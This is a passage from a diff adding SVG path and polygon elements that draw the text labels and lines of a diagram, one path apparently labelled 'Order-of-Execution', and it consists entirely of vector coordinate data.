+            <path d="M1096.0052,75.1992188 C1097.20312,75.1992188 1098.21059,74.925784 1099.02766,74.3789062 C1099.84472,73.8320285 1100.44367,73.0817105 1100.82453,72.1279297 C1101.20539,71.1741489 1101.39582,70.0397201 1101.39582,68.7246094 C1101.39582,66.6673074 1100.9401,65.0755265 1100.02863,63.9492188 C1099.11717,62.822911 1097.77929,62.2597656 1096.01496,62.2597656 C1094.23761,62.2597656 1092.88508,62.8212834 1091.95734,63.9443359 C1091.0296,65.0673884 1090.56574,66.660797 1090.56574,68.7246094 C1090.56574,70.7233173 1091.02635,72.3020775 1091.94758,73.4609375 C1092.86881,74.6197975 1094.22133,75.1992188 1096.0052,75.1992188 Z M1096.0052,76.2246094 C1094.89842,76.2246094 1093.91047,76.0406919 1093.04133,75.6728516 C1092.17218,75.3050112 1091.4593,74.7874382 1090.90266,74.1201172 C1090.34601,73.4527961 1089.92284,72.663416 1089.63313,71.7519531 C1089.34341,70.8404902 1089.19855,69.8346409 1089.19855,68.734375 C1089.19855,66.429676 1089.79262,64.6002672 1090.98078,63.2460938 C1092.16894,61.8919203 1093.84698,61.2148438 1096.01496,61.2148438 C1098.14388,61.2148438 1099.80402,61.8968031 1100.99543,63.2607422 C1102.18684,64.6246813 1102.78254,66.4524625 1102.78254,68.7441406 C1102.78254,69.8183647 1102.63606,70.8095658 1102.34309,71.7177734 C1102.05012,72.6259811 1101.62532,73.4153612 1101.06867,74.0859375 C1100.51203,74.7565138 1099.80077,75.2805971 1098.93488,75.6582031 C1098.06899,76.0358092 1097.09244,76.2246094 1096.0052,76.2246094 Z M1106.21996,76 C1106.20694,69.7174165 1106.20043,66.1497438 1106.20043,65.296875 L1107.19652,65.296875 L1107.27465,67.40625 C1107.65876,66.768226 1108.14704,66.2473979 1108.73949,65.84375 C1109.33194,65.4401021 1109.95043,65.2382812 1110.59496,65.2382812 C1110.86189,65.2382812 1111.14834,65.2610675 1111.45434,65.3066406 L1111.36645,66.3125 C1111.13207,66.2734373 1110.88468,66.2539062 1110.62426,66.2539062 C1109.71931,66.2539062 1108.95922,66.610348 1108.34398,67.3232422 C1107.72875,68.0361364 1107.42113,68.8808545 1107.42113,69.8574219 L1107.42113,76 L1106.21996,76 Z M1117.87027,76.2246094 C1116.44449,76.2246094 1115.33284,75.7298227 1114.53531,74.7402344 C1113.73778,73.7506461 1113.33902,72.3834723 1113.33902,70.6386719 C1113.33902,68.9980387 1113.7508,67.6650442 1114.57438,66.6396484 C1115.39795,65.6142527 1116.48355,65.1015625 1117.83121,65.1015625 C1118.49528,65.1015625 1119.15933,65.2447902 1119.8234,65.53125 C1120.48746,65.8177098 1120.99202,66.2636688 1121.33707,66.8691406 L1121.33707,61.1464844 L1122.50895,61.0390625 L1122.50895,76 L1121.50309,76 L1121.3273,74.3886719 C1120.95621,74.9941437 1120.45328,75.4514958 1119.81852,75.7607422 C1119.18375,76.0699885 1118.53434,76.2246094 1117.87027,76.2246094 Z M1117.84098,75.2675781 C1118.44645,75.2675781 1118.97704,75.1569021 1119.43277,74.9355469 C1119.8885,74.7141916 1120.25308,74.4016947 1120.52652,73.9980469 C1120.79996,73.594399 1121.00341,73.1305365 1121.13688,72.6064453 C1121.27034,72.0823542 1121.33707,71.5013053 1121.33707,70.8632812 C1121.33707,67.6796716 1120.16521,66.0878906 1117.82145,66.0878906 C1117.26806,66.0878906 1116.77978,66.2197252 1116.3566,66.4833984 C1115.93342,66.7470716 1115.59977,67.1018858 1115.35563,67.5478516 C1115.11148,67.9938173 1114.93082,68.4788385 1114.81363,69.0029297 C1114.69644,69.5270208 1114.63785,70.0787731 1114.63785,70.6582031 C1114.63785,71.1595077 1114.67366,71.6298806 1114.74527,72.0693359 C1114.81689,72.5087913 1114.93407,72.9270813 1115.09684,73.3242188 C1115.2596,73.7213562 1115.46142,74.061522 1115.7023,74.3447266 C1115.94319,74.6279311 1116.24592,74.8525382 1116.61051,75.0185547 C1116.97509,75.1845711 1117.38525,75.2675781 1117.84098,75.2675781 Z M1130.54598,76.234375 C1129.0681,76.234375 1127.89461,75.7395883 1127.02547,74.75 C1126.15632,73.7604117 1125.72176,72.4192793 1125.72176,70.7265625 C1125.72176,69.0924397 1126.14656,67.7545625 1126.99617,66.7128906 C1127.84579,65.6712188 1128.94441,65.1341147 1130.29207,65.1015625 C1131.54859,65.1015625 1132.55769,65.5507768 1133.31941,66.4492188 C1134.08114,67.3476607 1134.46199,68.5520758 1134.46199,70.0625 C1134.46199,70.121094 1134.46036,70.239908 1134.45711,70.4189453 C1134.45385,70.5979827 1134.45223,70.7233069 1134.45223,70.7949219 L1127.00105,70.7949219 C1127.01408,72.1686267 1127.3461,73.257483 1127.99715,74.0615234 C1128.64819,74.8655639 1129.50756,75.2675781 1130.57527,75.2675781 C1131.27189,75.2675781 1131.87735,75.1861987 1132.39168,75.0234375 C1132.90601,74.8606763 1133.44311,74.6295588 1134.00301,74.3300781 L1134.20809,75.2382812 C1133.12735,75.9023471 1131.90666,76.234375 1130.54598,76.234375 Z M1127.04988,69.8183594 L1133.14363,69.8183594 C1133.14363,68.6269472 1132.88647,67.7138704 1132.37215,67.0791016 C1131.85782,66.4443328 1131.15145,66.1269531 1130.25301,66.1269531 C1129.34154,66.1269531 1128.60588,66.4654914 1128.04598,67.1425781 C1127.48608,67.8196648 1127.15405,68.711583 1127.04988,69.8183594 Z M1137.7334,76 C1137.72038,69.7174165 1137.71387,66.1497438 1137.71387,65.296875 L1138.70996,65.296875 L1138.78809,67.40625 C1139.1722,66.768226 1139.66048,66.2473979 1140.25293,65.84375 C1140.84538,65.4401021 1141.46386,65.2382812 1142.1084,65.2382812 C1142.37533,65.2382812 1142.66178,65.2610675 1142.96777,65.3066406 L1142.87988,66.3125 C1142.64551,66.2734373 1142.39811,66.2539062 1142.1377,66.2539062 C1141.23274,66.2539062 1140.47266,66.610348 1139.85742,67.3232422 C1139.24218,68.0361364 1138.93457,68.8808545 1138.93457,69.8574219 L1138.93457,76 L1137.7334,76 Z M1155.31137,75.2675781 C1156.09262,75.2675781 1156.75179,75.0608745 1157.28891,74.6474609 C1157.82602,74.2340474 1158.21664,73.6888055 1158.46078,73.0117188 C1158.70492,72.334632 1158.82699,71.556645 1158.82699,70.6777344 C1158.82699,69.2975191 1158.53403,68.1875042 1157.94809,67.3476562 C1157.36215,66.5078083 1156.47023,66.0878906 1155.2723,66.0878906 C1154.49105,66.0878906 1153.82537,66.2978495 1153.27523,66.7177734 C1152.7251,67.1376974 1152.32309,67.6878221 1152.06918,68.3681641 C1151.81527,69.048506 1151.68832,69.8281206 1151.68832,70.7070312 C1151.68832,72.0416733 1151.99919,73.1354124 1152.62094,73.9882812 C1153.24269,74.8411501 1154.13949,75.2675781 1155.31137,75.2675781 Z M1155.22348,76.234375 C1154.25342,76.234375 1153.39894,75.9902368 1152.66,75.5019531 C1151.92106,75.0136694 1151.35792,74.3512412 1150.97055,73.5146484 C1150.58318,72.6780557 1150.38949,71.7324271 1150.38949,70.6777344 C1150.38949,69.8834596 1150.5018,69.1461623 1150.72641,68.4658203 C1150.95102,67.7854784 1151.27165,67.1962916 1151.68832,66.6982422 C1152.10499,66.2001928 1152.62256,65.8095717 1153.24105,65.5263672 C1153.85955,65.2431626 1154.54639,65.1015625 1155.3016,65.1015625 C1156.30421,65.1015625 1157.17334,65.3473283 1157.90902,65.8388672 C1158.6447,66.3304061 1159.19646,66.9912068 1159.5643,67.8212891 C1159.93214,68.6513713 1160.11605,69.5969999 1160.11605,70.6582031 C1160.11605,71.7259168 1159.92725,72.6764281 1159.54965,73.5097656 C1159.17204,74.3431031 1158.6089,75.0055314 1157.8602,75.4970703 C1157.11149,75.9886092 1156.2326,76.234375 1155.22348,76.234375 Z M1164.0027,76 L1164.0027,66.1855469 L1162.24488,66.1855469 L1162.32301,65.4335938 L1164.0027,65.296875 L1164.0027,64.8964844 C1164.0027,63.4902273 1164.24846,62.4681021 1164.74,61.8300781 C1165.23154,61.1920541 1165.98511,60.8730469 1167.00074,60.8730469 C1167.29371,60.8730469 1167.79175,60.9218745 1168.49488,61.0195312 L1168.40699,61.8203125 C1167.78199,61.7486976 1167.35882,61.7128906 1167.13746,61.7128906 C1166.39527,61.7128906 1165.88909,61.952146 1165.61891,62.4306641 C1165.34872,62.9091821 1165.21363,63.750645 1165.21363,64.9550781 L1165.21363,65.296875 L1167.82105,65.296875 L1167.82105,66.1855469 L1165.21363,66.1855469 L1165.21363,76 L1164.0027,76 Z M1083.73473,102 L1083.73473,87.46875 L1091.83043,87.46875 L1091.7816,88.5039062 L1084.98473,88.5039062 L1084.98473,93.9726562 L1091.44957,93.9726562 L1091.44957,95.0371094 L1084.98473,95.0371094 L1084.98473,100.955078 L1091.99645,100.955078 L1091.88902,102 L1083.73473,102 Z M1094.30105,102 L1098.2952,96.5800781 L1094.42801,91.296875 L1095.77566,91.296875 L1098.90066,95.7109375 L1102.00613,91.296875 L1103.38309,91.296875 L1099.52566,96.6191406 L1103.46121,102 L1102.16238,102 L1098.91043,97.4589844 L1095.66824,102 L1094.30105,102 Z M1110.2873,102.234375 C1108.80943,102.234375 1107.63594,101.739588 1106.7668,100.75 C1105.89765,99.7604117 1105.46309,98.4192793 1105.46309,96.7265625 C1105.46309,95.0924397 1105.88789,93.7545625 1106.7375,92.7128906 C1107.58711,91.6712188 1108.68574,91.1341147 1110.0334,91.1015625 C1111.28992,91.1015625 1112.29902,91.5507768 1113.06074,92.4492188 C1113.82246,93.3476607 1114.20332,94.5520758 1114.20332,96.0625 C1114.20332,96.121094 1114.20169,96.239908 1114.19844,96.4189453 C1114.19518,96.5979827 1114.19355,96.7233069 1114.19355,96.7949219 L1106.74238,96.7949219 C1106.7554,98.1686267 1107.08743,99.257483 1107.73848,100.061523 C1108.38952,100.865564 1109.24889,101.267578 1110.3166,101.267578 C1111.01322,101.267578 1111.61868,101.186199 1112.13301,101.023438 C1112.64733,100.860676 1113.18444,100.629559 1113.74434,100.330078 L1113.94941,101.238281 C1112.86868,101.902347 1111.64799,102.234375 1110.2873,102.234375 Z M1106.79121,95.8183594 L1112.88496,95.8183594 C1112.88496,94.6269472 1112.6278,93.7138704 1112.11348,93.0791016 C1111.59915,92.4443328 1110.89278,92.1269531 1109.99434,92.1269531 C1109.08287,92.1269531 1108.3472,92.4654914 1107.7873,93.1425781 C1107.22741,93.8196648 1106.89538,94.711583 1106.79121,95.8183594 Z M1121.91809,102.234375 C1120.88292,102.234375 1119.9845,101.980471 1119.22277,101.472656 C1118.46105,100.964841 1117.89465,100.302413 1117.52355,99.4853516 C1117.15246,98.6682902 1116.96691,97.7584686 1116.96691,96.7558594 C1116.96691,95.9876264 1117.07759,95.2649773 1117.29895,94.5878906 C1117.5203,93.9108039 1117.83443,93.3118516 1118.24133,92.7910156 C1118.64823,92.2701797 1119.17231,91.8584 1119.81359,91.5556641 C1120.45487,91.2529282 1121.16938,91.1015625 1121.95715,91.1015625 C1122.47147,91.1015625 1122.98416,91.1699212 1123.49523,91.3066406 C1124.0063,91.4433601 1124.38553,91.6061188 1124.63293,91.7949219 L1124.25207,92.703125 C1123.58149,92.3255189 1122.78723,92.1367188 1121.86926,92.1367188 C1120.75597,92.1367188 1119.87382,92.558264 1119.22277,93.4013672 C1118.57173,94.2444704 1118.24621,95.3626232 1118.24621,96.7558594 C1118.24621,98.0905015 1118.5701,99.1695922 1119.21789,99.9931641 C1119.86568,100.816736 1120.74946,101.228516 1121.86926,101.228516 C1122.65051,101.228516 1123.49035,101.033205 1124.38879,100.642578 L1124.57434,101.511719 C1124.26834,101.739584 1123.87121,101.916992 1123.38293,102.043945 C1122.89465,102.170899 1122.40637,102.234375 1121.91809,102.234375 Z M1131.6934,102.263672 C1131.1335,102.263672 1130.6143,102.200196 1130.13578,102.073242 C1129.65726,101.946288 1129.21293,101.747723 1128.80277,101.477539 C1128.39262,101.207355 1128.06873,100.824872 1127.83109,100.330078 C1127.59346,99.835284 1127.47465,99.2526075 1127.47465,98.5820312 L1127.47465,91.296875 L1128.68559,91.296875 L1128.68559,98.6113281 C1128.68559,99.1191432 1128.76371,99.5488264 1128.91996,99.9003906 C1129.07621,100.251955 1129.30082,100.517252 1129.59379,100.696289 C1129.88676,100.875326 1130.19926,101.000651 1130.53129,101.072266 C1130.86332,101.143881 1131.25069,101.179688 1131.6934,101.179688 C1132.1296,101.179688 1132.51371,101.142253 1132.84574,101.067383 C1133.17778,100.992513 1133.48702,100.863933 1133.77348,100.681641 C1134.05994,100.499348 1134.27966,100.234051 1134.43266,99.8857422 C1134.58565,99.5374332 1134.66215,99.1126327 1134.66215,98.6113281 L1134.66215,91.296875 L1135.87309,91.296875 L1135.87309,98.5820312 C1135.87309,99.128909 1135.79496,99.6171854 1135.63871,100.046875 C1135.48246,100.476565 1135.27413,100.828124 1135.01371,101.101562 C1134.75329,101.375001 1134.43917,101.601236 1134.07133,101.780273 C1133.70349,101.959311 1133.32589,102.084635 1132.93852,102.15625 C1132.55114,102.227865 1132.13611,102.263672 1131.6934,102.263672 Z M1142.35738,102.224609 C1141.45894,102.224609 1140.8014,102.021161 1140.38473,101.614258 C1139.96806,101.207355 1139.75973,100.544926 1139.75973,99.6269531 L1139.75973,92.1855469 L1138.24605,92.1855469 L1138.33395,91.453125 L1139.77926,91.3164062 L1140.10152,88.8652344 L1140.95113,88.8066406 L1140.95113,91.296875 L1144.07613,91.296875 L1144.07613,92.1855469 L1140.95113,92.1855469 L1140.95113,99.3730469 C1140.95113,100.128259 1141.07483,100.634439 1141.32223,100.891602 C1141.56962,101.148764 1142.00582,101.277344 1142.63082,101.277344 C1143.03447,101.277344 1143.53577,101.202475 1144.13473,101.052734 L1144.18355,101.990234 C1143.39579,102.146485 1142.78707,102.224609 1142.35738,102.224609 Z M1146.89832,102 L1146.89832,91.296875 L1148.11902,91.296875 L1148.11902,102 L1146.89832,102 Z M1146.89832,89.109375 L1146.89832,87.46875 L1148.10926,87.46875 L1148.10926,89.109375 L1146.89832,89.109375 Z M1156.38066,101.267578 C1157.16192,101.267578 1157.82109,101.060874 1158.3582,100.647461 C1158.89532,100.234047 1159.28594,99.6888055 1159.53008,99.0117188 C1159.77422,98.334632 1159.89629,97.556645 1159.89629,96.6777344 C1159.89629,95.2975191 1159.60332,94.1875042 1159.01738,93.3476562 C1158.43144,92.5078083 1157.53952,92.0878906 1156.3416,92.0878906 C1155.56035,92.0878906 1154.89466,92.2978495 1154.34453,92.7177734 C1153.7944,93.1376974 1153.39238,93.6878221 1153.13848,94.3681641 C1152.88457,95.048506 1152.75762,95.8281206 1152.75762,96.7070312 C1152.75762,98.0416733 1153.06849,99.1354124 1153.69023,99.9882812 C1154.31198,100.84115 1155.20878,101.267578 1156.38066,101.267578 Z M1156.29277,102.234375 C1155.32272,102.234375 1154.46823,101.990237 1153.7293,101.501953 C1152.99036,101.013669 1152.42722,100.351241 1152.03984,99.5146484 C1151.65247,98.6780557 1151.45879,97.7324271 1151.45879,96.6777344 C1151.45879,95.8834596 1151.57109,95.1461623 1151.7957,94.4658203 C1152.02031,93.7854784 1152.34095,93.1962916 1152.75762,92.6982422 C1153.17429,92.2001928 1153.69186,91.8095717 1154.31035,91.5263672 C1154.92884,91.2431626 1155.61569,91.1015625 1156.3709,91.1015625 C1157.37351,91.1015625 1158.24264,91.3473283 1158.97832,91.8388672 C1159.714,92.3304061 1160.26575,92.9912068 1160.63359,93.8212891 C1161.00143,94.6513713 1161.18535,95.5969999 1161.18535,96.6582031 C1161.18535,97.7259168 1160.99655,98.6764281 1160.61895,99.5097656 C1160.24134,100.343103 1159.67819,101.005531 1158.92949,101.49707 C1158.18079,101.988609 1157.30189,102.234375 1156.29277,102.234375 Z M1164.39816,102 L1164.39816,91.296875 L1165.45285,91.296875 L1165.61887,92.9472656 C1166.00298,92.3743461 1166.51893,91.9235042 1167.16672,91.5947266 C1167.81451,91.2659489 1168.51274,91.1015625 1169.26145,91.1015625 C1170.49192,91.1015625 1171.39686,91.4401008 1171.97629,92.1171875 C1172.55572,92.7942742 1172.84543,93.8749926 1172.84543,95.359375 L1172.84543,102 L1171.62473,102 L1171.62473,94.8125 C1171.59217,93.8619744 1171.39035,93.1783875 1171.01926,92.7617188 C1170.64816,92.34505 1170.03944,92.1367188 1169.19309,92.1367188 C1168.22303,92.1367188 1167.43039,92.3808569 1166.81516,92.8691406 C1166.19992,93.3574243 1165.81418,93.9889284 1165.65793,94.7636719 C1165.63189,95.069663 1165.61887,95.3886702 1165.61887,95.7207031 L1165.61887,102 L1164.39816,102 Z" id="Order-of-Execution" fill="#52B1DB"></path>
+            <polygon id="Line-6" fill="#52B1DB" fill-rule="nonzero" points="1082 117 1170.02299 117 1170.02299 116 1082 116"></polygon>
+            <path d="M84.421875,404 L84.421875,392.375 L87.9765625,392.375 C88.476565,392.375 88.9322896,392.428385 89.34375,392.535156 C89.7552104,392.641928 90.1263004,392.807291 90.4570312,393.03125 C90.7877621,393.255209 91.0442699,393.558592 91.2265625,393.941406 C91.4088551,394.324221 91.5,394.770831 91.5,395.28125 C91.5,395.578126 91.4856772,395.845051 91.4570312,396.082031 C91.4283853,396.319012 91.3750004,396.562499 91.296875,396.8125 C91.2187496,397.062501 91.1132819,397.281249 90.9804688,397.46875 C90.8476556,397.656251 90.6731782,397.835937 90.4570312,398.007812 C90.2408843,398.179688 89.9856786,398.320312 89.6914062,398.429688 C89.3971339,398.539063 89.0442729,398.625 88.6328125,398.6875 C88.2213521,398.75 87.7578151,398.78125 87.2421875,398.78125 C86.6901014,398.78125 86.0859408,398.747396 85.4296875,398.679688 L85.4296875,404 L84.421875,404 Z M87.34375,397.914062 C87.9479197,397.914062 88.4609354,397.854167 88.8828125,397.734375 C89.3046896,397.614583 89.6197906,397.479167 89.828125,397.328125 C90.0364594,397.177083 90.195312,396.963543 90.3046875,396.6875 C90.414063,396.411457 90.4752604,396.190105 90.4882812,396.023438 C90.5013021,395.85677 90.5078125,395.622397 90.5078125,395.320312 L90.5078125,395.273438 C90.5078125,394.591142 90.276044,394.083335 89.8125,393.75 C89.348956,393.416665 88.7500037,393.25 88.015625,393.25 L85.4296875,393.25 L85.4296875,397.820312 C85.8880231,397.882813 86.5260376,397.914062 87.34375,397.914062 Z M93.51125,404 C93.5008333,398.973933 93.495625,396.119795 93.495625,395.4375 L94.2925,395.4375 L94.355,397.125 C94.6622932,396.614581 95.0529143,396.197918 95.526875,395.875 C96.0008357,395.552082 96.4956224,395.390625 97.01125,395.390625 C97.2247927,395.390625 97.4539571,395.408854 97.69875,395.445312 L97.6284375,396.25 C97.4409366,396.21875 97.2430219,396.203125 97.0346875,396.203125 C96.3107256,396.203125 95.7026587,396.488278 95.2104688,397.058594 C94.7182788,397.628909 94.4721875,398.304684 94.4721875,399.085938 L94.4721875,404 L93.51125,404 Z M102.631875,404.1875 C101.449577,404.1875 100.510785,403.791671 99.8154688,403 C99.1201528,402.208329 98.7725,401.135423 98.7725,399.78125 C98.7725,398.473952 99.1123404,397.40365 99.7920313,396.570312 C100.471722,395.736975 101.35062,395.307292 102.42875,395.28125 C103.433963,395.28125 104.241247,395.640621 104.850625,396.359375 C105.460003,397.078129 105.764688,398.041661 105.764688,399.25 C105.764688,399.296875 105.763385,399.391926 105.760781,399.535156 C105.758177,399.678386 105.756875,399.778646 105.756875,399.835938 L99.7959375,399.835938 C99.8063542,400.934901 100.071977,401.805986 100.592813,402.449219 C101.113648,403.092451 101.801142,403.414062 102.655313,403.414062 C103.212607,403.414062 103.696977,403.348959 104.108438,403.21875 C104.519898,403.088541 104.949581,402.903647 105.3975,402.664062 L105.561563,403.390625 C104.696975,403.921878 103.720422,404.1875 102.631875,404.1875 Z M99.835,399.054688 L104.71,399.054688 C104.71,398.101558 104.504273,397.371096 104.092813,396.863281 C103.681352,396.355466 103.116254,396.101562 102.3975,396.101562 C101.66833,396.101562 101.079794,396.372393 100.631875,396.914062 C100.183956,397.455732 99.9183338,398.169266 99.835,399.054688 Z M107.510313,399.851562 L107.510313,398.992188 L111.291563,398.992188 L111.291563,399.851562 L107.510313,399.851562 Z M120.287188,404.09375 C120.037186,404.09375 119.819741,404.083333 119.634844,404.0625 C119.449947,404.041667 119.285886,403.988282 119.142656,403.902344 C118.999426,403.816406 118.88224,403.739584 118.791094,403.671875 C118.699947,403.604166 118.621823,403.470053 118.556719,403.269531 C118.491614,403.069009 118.442136,402.89974 118.408281,402.761719 C118.374427,402.623697 118.349688,402.382814 118.334063,402.039062 C118.318437,401.695311 118.309323,401.407553 118.306719,401.175781 C118.304115,400.944009 118.302813,400.578127 118.302813,400.078125 L118.302813,393.046875 C116.906972,392.953125 116.227292,392.947916 116.26375,393.03125 C115.711664,393.03125 115.314532,393.194009 115.072344,393.519531 C114.830155,393.845054 114.693438,394.434892 114.662188,395.289062 L114.662188,395.351562 L114.654375,395.421875 L116.646563,395.421875 L116.646563,396.148438 L114.654375,396.148438 L114.654375,404 L113.654375,404 L113.654375,396.148438 L112.435625,396.148438 L112.435625,395.421875 L113.654375,395.421875 L113.654375,395.273438 C113.675208,394.669268 113.753333,394.166669 113.88875,393.765625 C114.024167,393.364581 114.216874,393.062501 114.466875,392.859375 C114.716876,392.656249 114.987707,392.516927 115.279375,392.441406 C115.571043,392.365885 115.922602,392.328125 116.334063,392.328125 C116.125728,392.328125 116.021563,392.315104 116.021563,392.289062 C116.026771,392.216145 117.123114,392.249999 119.310625,392.390625 L119.310625,400.507812 C119.310625,400.940106 119.311927,401.249999 119.314531,401.4375 C119.317135,401.625001 119.330156,401.852863 119.353594,402.121094 C119.377031,402.389324 119.412187,402.572916 119.459063,402.671875 C119.505938,402.770834 119.573645,402.878906 119.662188,402.996094 C119.75073,403.113282 119.862708,403.188802 119.998125,403.222656 C120.133542,403.256511 120.302812,403.273438 120.505938,403.273438 C120.662188,403.273438 120.862707,403.263021 121.1075,403.242188 L121.193438,403.992188 C121.094479,404.002604 120.792398,404.036458 120.287188,404.09375 Z M122.829688,404 L122.829688,395.4375 L123.80625,395.4375 L123.80625,404 L122.829688,404 Z M122.829688,393.6875 L122.829688,392.375 L123.798438,392.375 L123.798438,393.6875 L122.829688,393.6875 Z M127.755,407.976562 L127.637813,407.109375 L129.450313,407.109375 C129.851356,407.109375 130.205519,407.074219 130.512813,407.003906 C130.820106,406.933593 131.079218,406.842448 131.290156,406.730469 C131.501095,406.618489 131.680781,406.462241 131.829219,406.261719 C131.977657,406.061197 132.093541,405.86198 132.176875,405.664062 C132.260209,405.466145 132.32401,405.209637 132.368281,404.894531 C132.412552,404.579426 132.439896,404.290366 132.450313,404.027344 C132.460729,403.764322 132.465938,403.432294 132.465938,403.03125 C132.465938,403.088542 132.460729,403.075521 132.450313,402.992188 L132.41125,402.453125 C132.083123,402.947919 131.695106,403.329426 131.247188,403.597656 C130.799269,403.865887 130.252399,404 129.606563,404 C129.096143,404 128.631304,403.908855 128.212031,403.726562 C127.792758,403.54427 127.449012,403.307293 127.180781,403.015625 C126.912551,402.723957 126.687293,402.390627 126.505,402.015625 C126.322707,401.640623 126.1925,401.266929 126.114375,400.894531 C126.03625,400.522134 125.997188,400.153648 125.997188,399.789062 C125.997188,399.330727 126.034948,398.894533 126.110469,398.480469 C126.18599,398.066404 126.317499,397.66146 126.505,397.265625 C126.692501,396.86979 126.926874,396.527345 127.208125,396.238281 C127.489376,395.949217 127.851352,395.717449 128.294063,395.542969 C128.736773,395.368489 129.236768,395.28125 129.794063,395.28125 C130.34094,395.28125 130.824008,395.389322 131.243281,395.605469 C131.662554,395.821616 132.051873,396.166664 132.41125,396.640625 L132.505,395.4375 L133.364375,395.4375 L133.364375,403.375 C133.364375,403.718752 133.360469,403.996093 133.352656,404.207031 C133.344844,404.41797 133.313594,404.704425 133.258906,405.066406 C133.204219,405.428387 133.128698,405.725259 133.032344,405.957031 C132.935989,406.188803 132.788855,406.445311 132.590938,406.726562 C132.39302,407.007814 132.154741,407.229166 131.876094,407.390625 C131.597447,407.552084 131.240679,407.690104 130.805781,407.804688 C130.370883,407.919271 129.877399,407.976562 129.325313,407.976562 L127.755,407.976562 Z M129.731563,403.210938 C130.111773,403.210938 130.455519,403.14974 130.762813,403.027344 C131.070106,402.904947 131.324009,402.743491 131.524531,402.542969 C131.725053,402.342447 131.894322,402.106772 132.032344,401.835938 C132.170365,401.565103 132.268021,401.285158 132.325313,400.996094 C132.382604,400.70703 132.41125,400.408856 132.41125,400.101562 L132.41125,399.210938 C132.41125,398.804685 132.361771,398.421877 132.262813,398.0625 C132.163854,397.703123 132.011511,397.371095 131.805781,397.066406 C131.600051,396.761717 131.317502,396.520834 130.958125,396.34375 C130.598748,396.166666 130.182086,396.078125 129.708125,396.078125 C129.322706,396.078125 128.975054,396.152343 128.665156,396.300781 C128.355259,396.449219 128.101355,396.645832 127.903438,396.890625 C127.70552,397.135418 127.538855,397.421873 127.403438,397.75 C127.26802,398.078127 127.172969,398.412759 127.118281,398.753906 C127.063594,399.095054 127.03625,399.445311 127.03625,399.804688 C127.03625,400.122397 127.060989,400.430988 127.110469,400.730469 C127.159948,401.029949 127.248489,401.333332 127.376094,401.640625 C127.503699,401.947918 127.666457,402.214843 127.864375,402.441406 C128.062293,402.66797 128.321405,402.852864 128.641719,402.996094 C128.962033,403.139324 129.32531,403.210938 129.731563,403.210938 Z M135.82875,404 L135.82875,392.117188 L136.7975,392.03125 L136.7975,396.34375 C136.7975,396.385417 136.796198,396.408854 136.793594,396.414062 C136.79099,396.419271 136.788385,396.447916 136.785781,396.5 L136.774063,396.734375 C137.471983,395.76562 138.471973,395.28125 139.774063,395.28125 C141.633447,395.28125 142.563125,396.403635 142.563125,398.648438 L142.563125,404 L141.602188,404 L141.602188,398.835938 C141.602188,397.872391 141.453752,397.175783 141.156875,396.746094 C140.859999,396.316404 140.336566,396.101562 139.586563,396.101562 C138.841767,396.101562 138.221982,396.298175 137.727188,396.691406 C137.232393,397.084637 136.927709,397.591143 136.813125,398.210938 C136.802708,398.419272 136.7975,398.729165 136.7975,399.140625 L136.7975,404 L135.82875,404 Z M147.449375,404.179688 C146.730621,404.179688 146.204585,404.016929 145.87125,403.691406 C145.537915,403.365884 145.37125,402.835941 145.37125,402.101562 L145.37125,396.148438 L144.160313,396.148438 L144.230625,395.5625 L145.386875,395.453125 L145.644688,393.492188 L146.324375,393.445312 L146.324375,395.4375 L148.824375,395.4375 L148.824375,396.148438 L146.324375,396.148438 L146.324375,401.898438 C146.324375,402.502607 146.423332,402.907551 146.62125,403.113281 C146.819168,403.319011 147.168123,403.421875 147.668125,403.421875 C147.991043,403.421875 148.392081,403.36198 148.87125,403.242188 L148.910313,403.992188 C148.280101,404.117188 147.793127,404.179688 147.449375,404.179688 Z M84.1640625,424 C84.1536458,418.973933 84.1484375,416.119795 84.1484375,415.4375 L84.9453125,415.4375 L85.0078125,417.125 C85.3151057,416.614581 85.7057268,416.197918 86.1796875,415.875 C86.6536482,415.552082 87.1484349,415.390625 87.6640625,415.390625 C87.8776052,415.390625 88.1067696,415.408854 88.3515625,415.445312 L88.28125,416.25 C88.0937491,416.21875 87.8958344,416.203125 87.6875,416.203125 C86.963538,416.203125 86.3554712,416.488278 85.8632812,417.058594 C85.3710913,417.628909 85.125,418.304684 85.125,419.085938 L85.125,424 L84.1640625,424 Z M93.2846875,424.1875 C92.1023899,424.1875 91.1635972,423.791671 90.4682813,423 C89.7729653,422.208329 89.4253125,421.135423 89.4253125,419.78125 C89.4253125,418.473952 89.7651529,417.40365 90.4448438,416.570312 C91.1245347,415.736975 92.0034321,415.307292 93.0815625,415.28125 C94.0867759,415.28125 94.8940595,415.640621 95.5034375,416.359375 C96.1128156,417.078129 96.4175,418.041661 96.4175,419.25 C96.4175,419.296875 96.4161979,419.391926 96.4135938,419.535156 C96.4109896,419.678386 96.4096875,419.778646 96.4096875,419.835938 L90.44875,419.835938 C90.4591667,420.934901 90.7247891,421.805986 91.245625,422.449219 C91.7664609,423.092451 92.4539541,423.414062 93.308125,423.414062 C93.8654195,423.414062 94.3497896,423.348959 94.76125,423.21875 C95.1727104,423.088541 95.6023936,422.903647 96.0503125,422.664062 L96.214375,423.390625 C95.3497873,423.921878 94.3732346,424.1875 93.2846875,424.1875 Z M90.4878125,419.054688 L95.3628125,419.054688 C95.3628125,418.101558 95.1570854,417.371096 94.745625,416.863281 C94.3341646,416.355466 93.7690661,416.101562 93.0503125,416.101562 C92.3211422,416.101562 91.7326064,416.372393 91.2846875,416.914062 C90.8367686,417.455732 90.5711463,418.169266 90.4878125,419.054688 Z M104.530313,427.8125 L104.530313,423.898438 C104.530313,423.460935 104.543333,423.065106 104.569375,422.710938 C104.26729,423.195315 103.854534,423.562499 103.331094,423.8125 C102.807654,424.062501 102.285523,424.1875 101.764688,424.1875 C101.014684,424.1875 100.366253,423.997398 99.819375,423.617188 C99.2724973,423.236977 98.8649493,422.722659 98.5967188,422.074219 C98.3284883,421.425778 98.194375,420.682296 98.194375,419.84375 C98.194375,418.942704 98.3284883,418.153649 98.5967188,417.476562 C98.8649493,416.799476 99.2764035,416.264325 99.8310938,415.871094 C100.385784,415.477863 101.051142,415.28125 101.827188,415.28125 C102.894901,415.28125 103.808955,415.763016 104.569375,416.726562 L104.631875,415.4375 L105.499063,415.4375 L105.499063,427.757812 L104.530313,427.8125 Z M101.764688,423.34375 C103.56678,423.34375 104.480833,422.195324 104.506875,419.898438 C104.506875,419.315101 104.458698,418.799481 104.362344,418.351562 C104.265989,417.903644 104.113647,417.509116 103.905313,417.167969 C103.696978,416.826821 103.413127,416.566407 103.05375,416.386719 C102.694373,416.20703 102.262086,416.117188 101.756875,416.117188 C101.387081,416.117188 101.055054,416.187499 100.760781,416.328125 C100.466509,416.468751 